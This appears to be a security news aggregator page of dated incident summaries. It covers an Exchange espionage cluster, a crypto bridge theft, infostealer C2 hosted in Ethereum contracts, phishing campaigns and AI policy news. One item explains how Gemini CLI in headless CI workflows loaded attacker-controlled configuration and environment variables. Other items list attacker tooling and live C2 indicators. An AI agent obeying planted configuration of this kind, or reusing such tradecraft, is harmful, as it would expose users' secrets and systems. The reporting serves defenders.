8Security Risks and Best Practices in the Adoption of AI Coding AssistantsThe rapid adoption of AI coding assistants is fundamentally transforming software development practices across the technology industry. Major companies such as Coinbase, Accenture, Box, Duolingo, Meta, and Shopify have begun mandating the use of AI coding assistants for their engineering teams, with some executives even taking drastic measures such as terminating employees who resist upskilling in AI. This widespread shift is driven by the significant productivity gains that AI coding assistants offer, enabling developers to accelerate deployment and experiment with new approaches. However, the integration of these tools introduces substantial new security challenges, particularly in the context of software supply chain security. Security researchers warn that AI-generated code often relies on existing libraries and codebases, which may contain old, vulnerable, or low-quality software. As a result, vulnerabilities that have previously existed can be reintroduced into new projects, and new security issues may also arise due to the lack of context-specific considerations in AI-generated code. The phenomenon known as "vibe coding"—where developers quickly adapt AI-generated code without fully understanding its implications—further exacerbates these risks. AI models trained on insecure or outdated data can perpetuate flaws, making it difficult for human reviewers to catch every potential vulnerability. The attack surface for organizations expands significantly as AI coding assistants become integral to the development lifecycle, potentially increasing risk by an order of magnitude. Security practitioners emphasize the need for new secure coding strategies tailored to the era of AI-assisted development. Effective communication between security teams and developers is critical to ensure that AI tools are adopted safely and that their benefits do not come at the expense of security. Organizations must rethink their development lifecycles, incorporating rigorous review processes and updated security protocols to address the unique challenges posed by AI-generated code. The transition to AI-driven development is inevitable, but it requires a proactive approach to risk management. Security teams must lead the way in establishing best practices, fostering collaboration, and ensuring that the adoption of AI coding assistants enhances rather than undermines organizational security. The industry is at a pivotal moment where the balance between productivity and security must be carefully managed. As AI coding assistants become non-negotiable tools for developers, the responsibility falls on both security professionals and engineers to adapt and safeguard the software supply chain. The future of secure software development will depend on how effectively organizations can integrate AI tools while mitigating the associated risks.ACM TechBrief warns of systemic failures in AI coding toolsMay 6, 2026
8China-Aligned Shadow-Earth-053 Breached Exchange Servers for Long-Term EspionageTrend Micro disclosed that the China-aligned cluster **SHADOW-EARTH-053** compromised more than a dozen organizations in at least eight countries by exploiting vulnerable Microsoft Exchange and IIS servers, including the `ProxyLogon` chain, then deploying **GODZILLA** web shells and the **ShadowPad** backdoor to maintain access. Victims included government agencies, defense contractors, technology firms, transportation organizations, and at least one target in Poland, with activity observed from December 2024 through April 2026. Researchers said the intrusions resemble broader Chinese state-linked operations such as Salt Typhoon and Volt Typhoon and may support long-term espionage, prepositioning, and potential future disruption. Post-compromise activity included DLL sideloading with a renamed Toshiba Bluetooth Stack executable, registry-resident shellcode execution via `EnumDesktopsA` callback injection, scheduled-task persistence, mailbox collection from Exchange, credential theft, and lateral movement using tools such as **IOX**, **GOST**, **Wstunnel**, **Sharp-SMBExec**, **Mimikatz**, and **Evil-CreateDump**. Trend Micro also identified overlap with a related cluster, **SHADOW-EARTH-054**, including shared tool hashes, reused vulnerabilities, and compromises at some of the same organizations, although the company assessed the relationship as overlapping exploitation rather than clearly coordinated operations. Defenders were urged to patch Exchange and IIS systems quickly and review IIS worker process activity, web-shell indicators, and other signs of stealthy post-exploitation.Citizen Lab exposes GLITTER CARP and SEQUIN CARP phishing campaignsMay 1, 2026
7Lazarus stole $290M from KelpDAO by exploiting LayerZero 1-of-1 DVN securityNorth Korea's **Lazarus Group** allegedly stole **$290 million** in `rsETH` from **KelpDAO** by abusing a weak **LayerZero** bridge configuration that relied on a **1-of-1 Decentralized Validator Network (DVN)**. According to post-incident reporting, the attackers compromised two LayerZero RPC nodes, poisoned data sent to the sole verifier, and used DDoS activity against legitimate RPC endpoints so the verifier would accept malicious data. That approval triggered the release of unbacked `rsETH`, while the malware reportedly self-destructed afterward to hinder forensic analysis. LayerZero Labs said the single-verifier setup created a clear single point of failure and helped contain the blast radius to KelpDAO's bridge. Follow-on analysis from **Dune Analytics** found the KelpDAO design was not an outlier: across roughly **2,665 active LayerZero OApp contracts** observed over 90 days, about **47%** used a **1-of-1** DVN configuration, **45%** used **2-of-2**, and only around **5%** used **3-of-3 or higher**. Researchers and ecosystem observers said the incident highlights structural risk across LayerZero's omnichain infrastructure, where single-validator deployments can expose protocol assets and user funds to bridge compromise. Open data and community analysis were released to scrutinize DVN security standards, while key questions remain about how the attackers obtained the RPC node list and achieved root-level access, including whether the intrusion stemmed from a prior compromise, a breached deployment pipeline, or insider access.KelpDAO rebuts LayerZero and announces rsETH migration to Chainlink CCIPMay 5, 2026
6GSA and NIST Launch Federal AI Evaluation Standards PartnershipThe **General Services Administration (GSA)** and **NIST** announced a partnership to create standardized methods for evaluating AI models and services before federal agencies deploy them in operational environments. The effort, housed in NIST’s **Center for AI Standards and Innovation**, is intended to establish common benchmarks, testing methodologies, and practical guidance so agencies can assess AI performance more consistently and reduce duplicated evaluation work across government. GSA said the work will also support *USAi.gov*, its platform for agency experimentation and onboarding of AI tools, with the stated goal of accelerating federal AI adoption while improving confidence in procurement and deployment decisions. A separate analysis of GSA’s broader AI procurement posture highlights the policy context around this move, arguing that the agency is trying to impose governance controls after an extended federal push to speed AI adoption. That commentary focuses on GSA’s proposed contract clause `GSAR 552.239-7001`, which would govern issues such as data control, portability, sourcing, and conflicts with vendor terms, and frames it as a response to governance gaps in federal AI acquisition. Other references in the set discuss unrelated enterprise AI governance advice, foreign AI policy, telecom strategy, legacy-code modernization, and MWC product announcements, and do not describe the same federal standards initiative.Commerce announces CAISI testing of Google, Microsoft and xAI modelsMay 5, 2026
5Multiple Vulnerabilities Disclosed in Red Hat Hardened Images RPMsdCERT issued advisories for **multiple vulnerabilities** affecting **Red Hat Hardened Images RPMs**, identifying the issue in notices `2026-1205` and `2026-1246`. The advisories indicate that security flaws were found in RPM packages used within Red Hat hardened container images, potentially exposing systems that rely on those images to a range of risks depending on the affected packages and deployed workloads. The publication of two separate dCERT notices suggests ongoing or updated vendor guidance around the same product area, and organizations using Red Hat hardened images should review the referenced advisories, determine which RPMs and image versions are affected, and prioritize remediation through updated packages or rebuilt images. Security teams should also verify downstream dependencies in container registries and production environments to ensure vulnerable image layers are replaced.dCERT publishes advisory 2026-1343 on fontconfig flaws in Red Hat RPMsMay 6, 2026
5Google Chrome Expands Gemini and On-Device AI Features, Including New Controls for Scam Detection ModelsGoogle is testing deeper **Gemini** integration in Chrome via a new internal feature called **“Skills,”** which appears to let users define named, instruction-based automations that Gemini can execute inside the browser. The feature is surfaced through a new `chrome://skills` page and aligns with Google’s stated direction of turning Gemini into a more agent-like assistant capable of acting across tabs and, over time, integrating more tightly with Google services. Separately, Google has added user controls to manage the **on-device GenAI model** used by Chrome’s *Enhanced Protection* (Safe Browsing) capabilities, which were previously upgraded with AI for “real-time” detection of dangerous sites, downloads, and potentially malicious extensions. In Chrome Canary, users can disable *On-device GenAI* under **Chrome → Settings → System**, which also enables deletion of the local model; Google indicated the local model may support additional security and browser features beyond scam detection as it rolls out more broadly.Report alleges Chrome silently downloads 4GB Gemini Nano model to devicesMay 6, 2026
5US Government Pushes Cybersecurity and AI Resilience for Critical InfrastructureThe U.S. government is advancing multiple **critical infrastructure cybersecurity** initiatives focused on resilience, public-private coordination, and the secure adoption of **AI**. National Cyber Director Sean Cairncross said the administration wants AI to be **secure by design**, framing technical security as an enabler of innovation rather than a barrier. The approach includes closer collaboration with private industry, expanded threat-information sharing, federal support for offensive cyber operations, and new mechanisms for AI companies to coordinate on threat response while the administration revises earlier policies it views as constraining competitiveness. The Department of Energy is preparing to release its first cybersecurity strategic plan to strengthen defenses for the **power grid** and improve preparedness for cyber and physical incidents affecting the energy sector. That effort is expected to deepen coordination with private operators and evaluate AI investments that could help defend critical infrastructure against AI-enabled threats. A separate article on why attacks against critical national infrastructure are dangerous is **not about this same policy development**; it is a general explainer on infrastructure targeting and disruption rather than reporting on the U.S. government’s current AI and energy cybersecurity initiatives.CISA unveils CI Fortify guidance for critical infrastructure conflictsMay 5, 2026
4Remus Infostealer Used Ethereum Smart Contracts to Rotate Live C2 InfrastructureResearchers mapped an active **Remus infostealer** infrastructure cluster that stores live command-and-control data in **Ethereum smart contracts**, extending the malware's use of dead-drop resolvers beyond Telegram and Steam. By querying contract `0x999941b74F6bbc921D5174A5b29911562cd2D7CF` via a public RPC endpoint and tracking its `DomainUpdated` activity, they identified a previously unlisted live C2 at `fightwa[.]biz:5902`, following earlier values including `chalx[.]live:5902`. Historical updates showed the operators were rotating infrastructure through late April, and the newly identified domain resolved to `185.53.179.128`, an IP already linked to Remus operations. Further analysis tied the campaign to a broader, automated infrastructure spread across more than 15 ASNs, with notable concentration at **Hostinger International Limited** (`AS47583`) and **Team Internet AG** (`AS206834`). Investigators found heavy use of `.biz` domains registered in early March through Dynadot, shared certificate and hosting patterns, and four additional Ethereum contracts beyond the one first identified, bringing the total to **five contracts** used to publish live C2 information. The contract set showed an evolution from simple `DomainStorage` logic to more advanced `DataStore` variants with stronger validation, ownership controls, and gas-optimized stealth features, while one v3 contract included a Russian-language code comment that researchers said was only a minor attribution clue consistent with the broader Remus/Lumma ecosystem.Additional Remus smart contracts and infrastructure concentration mappedApr 30, 2026
4UK Romance Fraud Losses Hit £102M as Reports SurgeCity of London Police said romance fraudsters stole **£102 million** from UK victims in 2025 across **10,784 reports** filed through the Report Fraud service, a **29 percent** increase year over year. Average losses were about **£9,500** per victim, with some cases reaching **£1 million**, as offenders built emotional trust over time before requesting money for fabricated travel, medical, or other urgent expenses. Older adults were hit hardest financially, with nearly half of total losses borne by people aged **55 to 74**. Men submitted the highest number of reports, while women suffered the greatest monetary losses. Authorities warned that romance fraud causes both financial and emotional harm and noted that, while the crime remains smaller in the UK than categories such as banking, investment, and online shopping fraud, comparable losses in the United States were far higher, with the FBI IC3 estimating **$929.4 million** lost to romance scams in 2025.ShinyHunters sets May 6 deadline for Cushman & Wakefield contactMay 6, 2026
4German and EU Civil Society Warn Against Weakened AI Surveillance and Safety RulesCivil society groups in Germany, including Amnesty International and the Chaos Computer Club, urged the government to withdraw draft laws that would expand digital policing powers through **biometric internet searches** and automated analysis of large police datasets using systems such as **Palantir**. Critics said the proposals from the justice and interior ministries lack judicial oversight, transparency, documentation requirements, and clear limits on data scope and analytical methods, creating risks of mass surveillance, discriminatory profiling, and intrusive scrutiny of victims, witnesses, and uninvolved people. Germany’s independent data protection authorities also concluded that the measures, as drafted, are incompatible with constitutional requirements and could effectively sidestep the EU AI Act’s ban on mass facial-image processing into biometric databases. At the EU level, a coalition led by **BEUC** and 31 other organizations warned that the proposed **AI Omnibus** could dilute safeguards by exempting sectors such as medical devices, radio equipment, toys, and machinery from the AI regulation’s direct scope. The groups argued that existing sector-specific product rules do not address AI-specific harms including discrimination, opacity, and the evolving behavior of AI systems, and said the change would create regulatory gaps, fragmentation, and legal uncertainty rather than simplification. They warned that weakening the framework would undermine consumer protection, fundamental rights, and trust in European AI governance as trilogue negotiations continue.German cabinet advances AI and biometric surveillance billsMay 5, 2026
3MinIO Flaws Enable Security Bypass and Information DisclosureGerman authorities issued advisories for multiple **MinIO** vulnerabilities that can bypass security controls, with one notice also warning of **information disclosure**. The advisories identify weaknesses in the object storage platform that could allow attackers to circumvent intended protections and expose sensitive data under certain conditions. A later advisory expanded the scope from a single issue to **multiple vulnerabilities** affecting MinIO, all tied to bypassing security measures. Organizations using MinIO should review the referenced advisories, identify affected deployments, and prioritize vendor fixes or mitigations to reduce the risk of unauthorized access and data exposure.dCERT publishes MinIO advisory 2026-1353May 6, 2026
3Trusted Cloud Services Used in Large-Scale Facebook and Microsoft Phishing CampaignsResearchers reported two large phishing operations that abused trusted platforms to improve delivery and evade defenses. Guardio said the **AccountDumpling** campaign used Google AppSheet to send emails from legitimate Google infrastructure while impersonating **Meta Support** and recruiters, luring Facebook Business users with fake account disablement notices, copyright complaints, and job offers. The operation compromised about **30,000 Facebook accounts** across roughly **50 countries**, stealing credentials, `2FA` codes, personal data, and government ID images; the stolen information was often funneled through Telegram channels, and the hijacked accounts were later sold or monetized through fraudulent advertising and scams. Evidence in generated PDF metadata linked the activity to Vietnam-based operators, including an individual identified as **PHẠM TÀI TÂN**. Microsoft separately disclosed an adversary-in-the-middle phishing campaign that used fake workplace compliance notices to target more than **35,000 users** at **13,000 organizations** in **26 countries**, with most activity concentrated in the United States. Attackers posed as internal HR and compliance teams, sent urgent messages with attached PDFs, and pushed victims through redirects, CAPTCHA checks, and a counterfeit Microsoft sign-in page designed to steal session tokens rather than just passwords, allowing account access without the victim's second factor. The incidents show how attackers are increasingly relying on legitimate cloud services and convincing enterprise-themed lures to bypass spam controls, defeat traditional authentication protections, and accelerate account takeover at scale.Microsoft discloses findings on AiTM compliance-notice campaignMay 5, 2026
2Google Patches CVSS 10.0 RCE in Gemini CLI Headless ModeGoogle has patched a maximum-severity remote code execution flaw in **Gemini CLI** that affected headless deployments, especially **GitHub Actions** and other CI/CD workflows. The vulnerability stemmed from overly permissive workspace trust handling that automatically treated active folders as trusted and could load attacker-controlled configuration files and environment variables from local `.gemini` directories. The issue was independently discovered by Elad Meged of Novee and Dan Lisichkin of Pillar Security, and researchers warned that successful exploitation could expose secrets, credentials, source code, and connected downstream systems. Google said the issue is addressed in **Gemini CLI** versions `0.39.1` and `0.40.0-preview.3`, but warned that applying the fix may require additional workflow changes to avoid breaking automation. The `run-gemini-cli` GitHub Action defaults to the latest release, which can disrupt pipelines that depended on the previous implicit trust behavior, while workflows using `--yolo` mode may fail silently unless tool allowlists are updated to align with the new policy engine. Google is urging organizations to review CI/CD jobs and move to explicit trust settings and compatible allowlists before resuming automated use.Google warns patched Gemini CLI may still require workflow changesMay 1, 2026
2Meta Removes End-to-End Encryption for Instagram Direct MessagesMeta said it will discontinue Instagram’s optional end-to-end encrypted direct messages on **May 8, 2026**, ending a feature introduced in 2023 after reporting that few users enabled it. After the cutoff, Instagram DMs will rely on standard transport encryption instead of end-to-end encryption, allowing message content to be decrypted on Meta’s servers. Users with existing encrypted threads are being notified to save or export content they want to keep before the feature is turned off, and Meta has pointed privacy-conscious users toward **WhatsApp** for encrypted messaging. The change has triggered criticism from privacy advocates, who warn that server-readable messages expand the risk surface for breaches, internal access, moderation scanning, and legal disclosure. Reports also say the move could make private message content more available for automated processing and other internal uses, though Meta’s public rationale focused on low adoption and operational needs rather than explicitly confirming advertising or AI training. The decision also contrasts with earlier public commitments by Meta leadership favoring broader deployment of private, encrypted communications.Instagram encrypted DM support scheduled to endMay 8, 2026
2Meta Patches WhatsApp Flaws Enabling Malicious URL Handling and Windows File SpoofingMeta disclosed and patched two WhatsApp vulnerabilities affecting **iOS, Android, and Windows**, including `CVE-2026-23866`, which allowed attackers to abuse Instagram Reels integration and incomplete validation of AI-rich response messages to make victim devices process media from attacker-controlled URLs. The flaw could potentially trigger OS-level custom URL scheme handlers without user consent, creating opportunities for phishing, tracking, malware delivery, and other social-engineering attacks through seemingly legitimate WhatsApp content. Meta also fixed `CVE-2026-23863`, a WhatsApp for Windows filename spoofing issue caused by embedded NUL bytes that could make executable files appear to be benign documents and require only a single user click to exploit. The company said both bugs were reported through its bug bounty program and that it had **no evidence of active exploitation** at disclosure, while urging users to update WhatsApp from official sources and advising organizations to verify Windows clients are patched and include messaging apps in enterprise attack-surface management.Meta urges users and enterprises to update affected WhatsApp versionsMay 5, 2026
2State Health Insurance Exchanges Exposed Sensitive Applicant Data to Ad Tech FirmsNearly all 20 U.S. state-run health insurance marketplaces were found to be transmitting sensitive applicant data to major advertising and technology companies through misconfigured web tracking pixels. A Bloomberg investigation reported that data sent from exchange websites included details such as **race**, **sex**, email addresses, phone numbers, ZIP codes, country identifiers, and even whether applicants had incarcerated family members. The recipients reportedly included **Google, LinkedIn, Meta, Snap, and TikTok**, raising concerns that government healthcare platforms leaked protected personal and health-related information at scale. The exposure affected marketplaces used by more than **seven million Americans** buying health insurance this year, significantly widening the potential impact. Specific cases included New York's exchange sharing incarceration-related family information, Washington, D.C.'s exchange sending race and sex data to TikTok, and Virginia removing a Meta tracker after ZIP code sharing was identified. Following the findings, Washington, D.C. paused its TikTok tracker rollout and Virginia removed Meta's tracker, underscoring how embedded analytics and advertising tools on public-sector healthcare sites can create broad privacy risks.Virginia removes Meta tracker from its exchange websiteMay 4, 2026
Want to go back further? Create an account to access the full archive, custom alerts, and deeper analysis.
Prefer RSS? Grab any topic — or the full firehose — from the feeds page